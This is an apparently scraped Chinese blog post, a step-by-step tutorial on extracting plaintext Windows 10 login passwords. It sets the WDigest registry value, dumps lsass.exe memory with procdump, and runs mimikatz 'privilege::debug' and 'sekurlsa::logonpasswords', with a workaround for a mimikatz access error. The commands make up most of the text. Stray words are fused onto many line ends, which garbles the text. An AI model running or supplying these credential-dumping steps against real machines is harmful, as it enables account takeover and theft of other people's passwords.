优雅的获取win10密码

时间  2019-11-15
标签 优雅 获取 win10 win 密码 栏目 Windows 繁體版
原文   原文链接

工具:
procdump & mimikatzwindows

实验环境:
实验主机:win10
帐户密码:17位复杂密码(大小写+特殊字符+数字)
(虽然微软很早就更新了补丁来防止获取windows的明文密码,可是能够修改注册表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的键值为1 即表明WDigest的密码支持明文形式保存在LSA内存中)
优雅的获取win10密码sass

步骤:ide

使用cmd运行procdump.exe
输入:Procdump.exe -accepteula -ma lsass.exe lsass.dmp工具

优雅的获取win10密码

使用cmd运行mimikatz.exe
优雅的获取win10密码ui

输入:privilege::debug
sekurlsa::logonpasswordsurl

在wdigest:下显示的就是管理员的密码debug

补充:3d

若是按照网上的教程在mimikatz输入指令这里100%报错
(ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))blog

privilege::debug(提权)
sekurlsa::logonpasswords(抓密码)教程

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程